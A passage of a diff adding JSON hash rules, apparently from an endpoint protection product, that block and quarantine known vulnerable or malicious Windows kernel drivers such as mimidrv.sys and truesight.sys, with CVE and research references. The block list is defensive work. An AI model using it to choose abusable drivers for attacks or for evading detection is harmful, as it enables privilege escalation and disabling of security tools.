+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610308Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2101d5e80e92c55ecfd8c24fcf2202a206a4fd70195a1378f88c4cc04d336f22",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe34b5db-ba0a-5877-b632-98bcac0e3316",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151986Z",
+ "creation_date": "2026-03-23T11:45:31.151988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0f6e476d42dabffd178a622805677695a9f077497964e37121940ef145528ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe357f21-9829-588a-b0e4-bbbcc1db9019",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146902Z",
+ "creation_date": "2026-03-23T11:45:32.146905Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "015956494226d4cbb89283c7b915a46353670c7d41e02f0f2ba741c0d2c73615",
+ "comment": "Vulnerable Kernel Driver (aka BioNTdrv.sys) [https://www.loldrivers.io/drivers/e6378671-986d-42a1-8e7a-717117c83751/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe365c9b-2965-5ddc-9d30-93e2e3aba9a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468555Z",
+ "creation_date": "2026-03-23T11:45:30.468558Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468567Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13999eb266b759e879816fdab640d59ef9e35e2ea61575810979d9eb22fdfd4d",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe45c1ce-334b-55e6-9f47-ef3ff75a2086",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822336Z",
+ "creation_date": "2026-03-23T11:45:30.822338Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822343Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3eea0723a9007f5a85382cd2e92d9f9cc94bb9e2f7fbb6d99a7c70c8527caa5a",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe45ebae-252b-545b-9470-2615b6528b89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478076Z",
+ "creation_date": "2026-03-23T11:45:31.478080Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478107Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f41710a76004fde6747989dab3cc4ec3cde19e40499b7210b67c83c69fae2fe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe49018c-40a5-5bb7-9552-13a7f405aac2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462057Z",
+ "creation_date": "2026-03-23T11:45:30.462060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462069Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "083a311875173f8c4653e9bbbabb689d14aa86b852e7fa9f5512fc60e0fd2c43",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe52c3fd-5f98-5a15-997b-fdff7abb212a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622402Z",
+ "creation_date": "2026-03-23T11:45:29.622404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0be4912bfd7a79f6ebfa1c06a59f0fb402bd4fe0158265780509edd0e562eac1",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe535935-34ce-50f7-b996-bc197d68e862",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144902Z",
+ "creation_date": "2026-03-23T11:45:32.144905Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae095718a860962d213622b719f8dbcde190e4bedc2cd92e3865efaede65380f",
+ "comment": "Vulnerable Kernel Driver (aka tboflhelper.sys) [https://www.loldrivers.io/drivers/07c57c69-c8d7-40cf-8bcc-612671427044/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe54003a-4eca-5a70-8484-9505c0d947c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833671Z",
+ "creation_date": "2026-03-23T11:45:30.833675Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833683Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a414cc7b9da40056835645b86ff7b722160c6e41add2d4a527cca1256086a2d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe58a499-1770-56d0-be87-c8f96c9040e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835755Z",
+ "creation_date": "2026-03-23T11:45:30.835757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c2c87b67ce1fc02c4b1fc748d8e444bfac462394f88c7547a2d1b2cb8d9b2e3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe594c97-a92b-5aa7-a1b8-0b0a8c2fb8e4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827730Z",
+ "creation_date": "2026-03-23T11:45:31.827732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bab93587bf3d029723aa1348414a9aff5e032d52811ad42d6d8649d7668cc1a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe5c63ee-c7f1-5795-8484-6b69cef39233",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618443Z",
+ "creation_date": "2026-03-23T11:45:29.618445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618451Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe2fb5d6cfcd64aeb62e6bf5b71fd2b2a87886eb97ab59e5353ba740da9f5db5",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe5d6e49-8eb0-51cb-9c14-215c9f4bd7b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470610Z",
+ "creation_date": "2026-03-23T11:45:30.470614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6413aa70a5664953223205b6364d676fac0c0491d12ddaadc91b7f12fa53f77b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe5e84aa-e823-5fdb-b1b5-a3b7d7c2d181",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979238Z",
+ "creation_date": "2026-03-23T11:45:29.979241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979246Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c7f24d8ed000bc7ce842e4875b467f9de1626436e051bd351adf1f6f8bbacf8",
+ "comment": "Vulnerable Kernel Driver (aka d2.sys) [https://www.loldrivers.io/drivers/d05a0a6c-c037-4647-99ac-c41593190223/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe6176ae-6f93-5bbc-96d4-5d4795334128",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967693Z",
+ "creation_date": "2026-03-23T11:45:29.967695Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967701Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7fb0f6fc5bdd22d53f8532cb19da666a77a66ffb1cf3919a2e22b66c13b415b7",
+ "comment": "Vulnerable Kernel Driver (aka fidpcidrv64.sys) [https://www.loldrivers.io/drivers/a005e057-c84f-47cd-9b4b-5b1e51a06ab4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe684a73-3224-502b-b6a2-b8e5a6cd1dcf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619867Z",
+ "creation_date": "2026-03-23T11:45:29.619879Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619884Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cef918675dfaeb50cacd36b9c06871fd05e9ffea7addf98a396fae131abe30a",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe6b3c93-b100-561e-a35d-433e22332075",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499269Z",
+ "creation_date": "2026-03-23T11:45:31.499272Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9aa200322a44c8dcd91a8a7075ee5f23248401a53d532081f28d9b5c7fb49b1a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe7f4840-f5e0-53d4-976a-b8bb2b1632ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615272Z",
+ "creation_date": "2026-03-23T11:45:29.615274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "299f36c717c5d5d77a8e9c15879e95cd825f74e77c7ed24e7cccbefeb38a2165",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe860e38-399f-5521-908c-2475266b7a6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976903Z",
+ "creation_date": "2026-03-23T11:45:29.976905Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3513c01158cb9d473c4cf99bb7fa73363531edf5b7bf4c7c4cfedecb6fe1775b",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe8d2098-c900-5f7f-b3a2-70092468bdfa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481390Z",
+ "creation_date": "2026-03-23T11:45:31.481394Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481404Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1050f743944f58a7d74a3b34c8ca5b038de9fee3bf7ab39cfb531742f91db90a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe8e340f-4986-5131-b9ef-3b090fb5b13b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818520Z",
+ "creation_date": "2026-03-23T11:45:31.818524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0972fa03d469209602de929894d1a99fc18b5565d621b2aad826e7575a9b72d7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe93ceb1-4223-538a-8034-fdcf4c38d7a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467955Z",
+ "creation_date": "2026-03-23T11:45:30.467960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b6d450b6e2b66e8356b9d8a354e8c3a96426b7f15adf2f2025dda13c01881a3",
